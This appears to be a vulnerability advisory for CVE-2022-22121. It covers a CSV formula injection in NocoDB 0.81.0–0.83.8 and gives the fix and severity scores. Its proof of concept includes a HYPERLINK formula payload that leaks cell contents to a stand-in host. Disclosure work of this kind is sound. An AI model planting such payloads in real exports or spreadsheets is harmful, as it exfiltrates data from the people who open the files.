icon

We found results for “

CVE-2022-22121

Date: January 10, 2022

Overview

In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.

Details

NocoDB download as CSV functionality fails to sanitize user-controlled input before writing it to the downloaded CSV file which leads to a formula injection vulnerability.

PoC Details

Sign in to the NocoDB application and create a new table, using a lower privileged user like editor, create a new row on this table with value set to the formula injection payload shown below. Then click download as CSV which leads to the formula injection vulnerability be triggered.

PoC Code

=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")

Affected Environments

0.81.0 through 0.83.8

Prevention

Update to version 0.84.0 or later

Language: VUE

Good to know:

icon
icon

Injection

CWE-74

Improper Neutralization of Formula Elements in a CSV File

CWE-1236
icon

Upgrade Version

Upgrade to version nocodb - 0.84.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: